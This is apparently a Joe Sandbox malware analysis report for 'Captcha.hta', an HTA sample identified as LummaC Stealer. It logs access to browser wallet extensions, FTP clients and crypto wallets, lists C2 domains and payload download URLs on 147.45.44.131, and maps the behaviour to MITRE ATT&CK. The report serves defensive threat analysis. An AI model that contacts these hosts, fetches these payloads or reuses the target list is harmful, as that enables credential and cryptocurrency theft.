Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4103780633.00000000058D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	22 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	11 File and Directory Discovery	Remote Services	1 Archive Collected Data	11 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	111 Process Injection	31 Obfuscated Files or Information	LSASS Memory	23 System Information Discovery	Remote Desktop Protocol	31 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	321 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Command and Scripting Interpreter	Login Hook	Login Hook	1 Masquerading	NTDS	21 Virtualization/Sandbox Evasion	Distributed Component Object Model	1 Email Collection	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	Network Logon Script	21 Virtualization/Sandbox Evasion	LSA Secrets	1 Process Discovery	SSH	2 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	111 Process Injection	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Captcha.hta	13%	ReversingLabs	Script.Virus.Boxter

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dll	100%	Avira	HEUR/AGEN.1300034
C:\Users\user\AppData\Local\Temp\cqvy0dal\cqvy0dal.dll	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://147.45.44.131/infopage/nghp.exe	0%	Avira URL Cloud	safe
http://147.45.44.131/infopag4v2	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png4	0%	Avira URL Cloud	safe
https://immureprech.biz/	0%	Avira URL Cloud	safe
https://immureprech.biz/apiP	0%	Avira URL Cloud	safe
awake-weaves.cyou	100%	Avira URL Cloud	malware
http://crl.microsoft	0%	Avira URL Cloud	safe
http://beta.visualstudio.net/net/sdk/feedback.asp	0%	Avira URL Cloud	safe
sordid-snaked.cyou	100%	Avira URL Cloud	malware
http://pesterbdd.com/images/Pester.png	0%	Avira URL Cloud	safe
http://147.45.44.131/infopage/nghp.exeT	0%	Avira URL Cloud	safe
https://immureprech.biz/apiflaU.d	0%	Avira URL Cloud	safe
http://147.45.44.131/infopage/bgfi.ps1V=y	0%	Avira URL Cloud	safe
https://immureprech.biz/api	100%	Avira URL Cloud	malware
immureprech.biz	0%	Avira URL Cloud	safe
https://immureprech.biz/V	0%	Avira URL Cloud	safe
deafeninggeh.biz	0%	Avira URL Cloud	safe
http://147.45.44.131/infopage/bgfi.ps18=S	0%	Avira URL Cloud	safe
http://147.45.44.131/infopage/bgfi.ps18O4	0%	Avira URL Cloud	safe
https://go.micro	0%	Avira URL Cloud	safe
debonairnukk.xyz	0%	Avira URL Cloud	safe
http://147.45.44.131	0%	Avira URL Cloud	safe
effecterectz.xyz	0%	Avira URL Cloud	safe
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
diffuculttan.xyz	0%	Avira URL Cloud	safe
https://immureprech.biz/pR)D#=	0%	Avira URL Cloud	safe
http://147.45.44.131/infopage/ilk.exe	0%	Avira URL Cloud	safe
http://147.45.448	0%	Avira URL Cloud	safe
http://147.45.44.131/infopage/nghp.exe4	0%	Avira URL Cloud	safe
wrathful-jammy.cyou	100%	Avira URL Cloud	malware
https://immureprech.biz:443/apil	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
https://immureprech.biz:443/api7uiqa8.default-release/key4.dbPK	0%	Avira URL Cloud	safe
http://147.45.44.131/infopage/bgfi.ps1	0%	Avira URL Cloud	safe
http://147.45.44.131/infopage/nghp.exeTp	0%	Avira URL Cloud	safe
http://147.45.44.131/infopag4	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
immureprech.biz	172.67.207.38	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
sordid-snaked.cyou	true	Avira URL Cloud: malware	unknown
http://147.45.44.131/infopage/nghp.exe	true	Avira URL Cloud: safe	unknown
awake-weaves.cyou	true	Avira URL Cloud: malware	unknown
immureprech.biz	true	Avira URL Cloud: safe	unknown
deafeninggeh.biz	true	Avira URL Cloud: safe	unknown
https://immureprech.biz/api	true	Avira URL Cloud: malware	unknown
debonairnukk.xyz	true	Avira URL Cloud: safe	unknown
diffuculttan.xyz	true	Avira URL Cloud: safe	unknown
effecterectz.xyz	true	Avira URL Cloud: safe	unknown
wrathful-jammy.cyou	true	Avira URL Cloud: malware	unknown
http://147.45.44.131/infopage/bgfi.ps1	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://beta.visualstudio.net/net/sdk/feedback.asp	powershell.exe, 00000004.00000002.4110820466.00000000708D1000.00000020.00000001.01000000.0000000C.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png4	powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://immureprech.biz/apiP	RegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://immureprech.biz/	RegAsm.exe, 00000007.00000002.4207908968.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4105365673.0000000006D30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.131/infopag4v2	powershell.exe, 00000004.00000002.4100255079.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microsoft	RegAsm.exe, 00000007.00000002.4207908968.0000000000E11000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4105365673.0000000006D30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://immureprech.biz/apiflaU.d	RegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000004.00000002.4100255079.000000000504B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.131/infopage/bgfi.ps1V=y	curl.exe, 00000003.00000002.4070019768.000000000318B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.131/infopage/bgfi.ps18=S	curl.exe, 00000003.00000002.4070019768.000000000318B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.131/infopage/nghp.exeT	powershell.exe, 00000004.00000002.4105665571.0000000006DD8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://immureprech.biz/V	RegAsm.exe, 00000007.00000002.4210634675.0000000003379000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html4	powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4105365673.0000000006D30000.00000004.00000020.00020000.00000000.sdmp	false		high
http://147.45.44.131/infopage/bgfi.ps18O4	curl.exe, 00000003.00000002.4070019768.0000000003180000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.131	powershell.exe, 00000004.00000002.4100255079.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4100255079.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://147.45.448	powershell.exe, 00000004.00000002.4100255079.0000000004A7B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.131/infopage/ilk.exe	powershell.exe, 00000004.00000002.4100255079.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.4100255079.0000000004A38000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester4	powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000004.00000002.4100255079.00000000046E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://147.45.44.131/infopage/nghp.exe4	powershell.exe, 00000004.00000002.4100255079.0000000004836000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.4103780633.000000000574F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://immureprech.biz/pR)D#=	RegAsm.exe, 00000007.00000002.4208171666.0000000000E2D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.quovadis.bm0	powershell.exe, 00000004.00000002.4098845897.000000000053E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://immureprech.biz:443/api7uiqa8.default-release/key4.dbPK	RegAsm.exe, 00000007.00000002.4210550709.0000000003365000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	powershell.exe, 00000004.00000002.4098845897.000000000053E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.4207121746.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.4100255079.00000000046E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://immureprech.biz:443/apil	RegAsm.exe, 00000007.00000002.4210550709.0000000003365000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.131/infopag4	powershell.exe, 00000004.00000002.4100255079.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://147.45.44.131/infopage/nghp.exeTp	powershell.exe, 00000004.00000002.4105665571.0000000006DD8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
147.45.44.131	unknown	Russian Federation		2895	FREE-NET-ASFREEnetEU	true
172.67.207.38	immureprech.biz	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573886
Start date and time:	2024-12-12 17:31:56 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected VM Detection
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Captcha.hta
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winHTA@14/10@1/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 97% Number of executed functions: 44 Number of non-executed functions: 101
Cookbook Comments:	Found application associated with file extension: .hta Stop behavior analysis, all processes terminated

Warnings

Execution Graph export aborted for target mshta.exe, PID 2492 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 5040 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Captcha.hta

Simulations

Behavior and APIs

Time	Type	Description
11:33:55	API Interceptor	24x Sleep call for process: powershell.exe modified
11:33:59	API Interceptor	8x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
147.45.44.131	Captcha.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, LummaC Stealer	Browse	147.45.44.131/infopage/ung0.exe
	EBUdultKh7.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.44.131/infopage/vsom.exe
	MiJZ3z4t5K.exe	Get hash	malicious	Unknown	Browse	147.45.44.131/infopage/Tom.exe
	ZjH6H6xqo7.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tvh53.exe
	nlJ2sNaZVi.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tbh75.exe
	TZ33WZy6QL.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tbg9.exe
	7IXl1M9JGV.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tbg9.exe
	7IXl1M9JGV.exe	Get hash	malicious	Unknown	Browse	147.45.44.131/infopage/bhdh552.ps1
	Rechnung_643839483.pdf.lnk	Get hash	malicious	Unknown	Browse	147.45.44.131/infopage/cdeea.exe
172.67.207.38	http://gerxx.ru	Get hash	malicious	Unknown	Browse
172.67.207.38	https://tdazl.fgfhgjyukh.top/?jul=17Y2Fzc2FuZHJhLmFwbGV5QHRoZXJtb2Zpc2hlci5jb20=	Get hash	malicious	HTMLPhisher	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://t.co/srDcIXmUyA	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://docs.google.com/presentation/d/e/2PACX-1vRMxSBYgTIj7bH-OYJSKudpxaekmSD6B-b603kyy-2ygb7TXyfRQC-hU8fjYDSrrObCUBq88ZmRswwh/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	172.67.134.110
	NOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdf	Get hash	malicious	Unknown	Browse	162.247.243.29
	file.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.79.7
	MOV-4106720318-MMS028.mp4.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	zapret.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	https://forms.office.com/e/YpaL2Dw0r2	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://connect-velocity-33392.my.salesforce-sites.com/help	Get hash	malicious	Unknown	Browse	104.26.10.50
	phish_alert_sp2_2.0.0.0 (1).eml	Get hash	malicious	Unknown	Browse	162.159.140.237
FREE-NET-ASFREEnetEU	Captcha.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, LummaC Stealer	Browse	147.45.44.131
	EBUdultKh7.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.44.131
	arm5.elf	Get hash	malicious	Unknown	Browse	193.233.202.23
	Wh2c6sgwRo.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	147.45.47.151
	installer.exe	Get hash	malicious	Unknown	Browse	193.233.254.0
	installer.exe	Get hash	malicious	Unknown	Browse	193.233.254.0
	MiJZ3z4t5K.exe	Get hash	malicious	Unknown	Browse	147.45.44.131
	tyhkamwdmrg.exe	Get hash	malicious	LummaC Stealer	Browse	147.45.47.81
	kyhjasehs.exe	Get hash	malicious	DCRat	Browse	147.45.47.156

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.207.38
	ZzS8KjNjr7.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	172.67.207.38
	Szi2WJUKmv.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	172.67.207.38
	aYxpioi6G3.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	PGkSZbFKmI.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	172.67.207.38
	HUMpaHS1WZ.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	FAz4V7wbYU.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	172.67.207.38
	hmFHoD7ODu.exe	Get hash	malicious	LummaC	Browse	172.67.207.38
	yiDQb6GkBq.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar	Browse	172.67.207.38
	m9WtCz2n9I.exe	Get hash	malicious	LummaC	Browse	172.67.207.38

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\RESEA2B.tmp

Download File

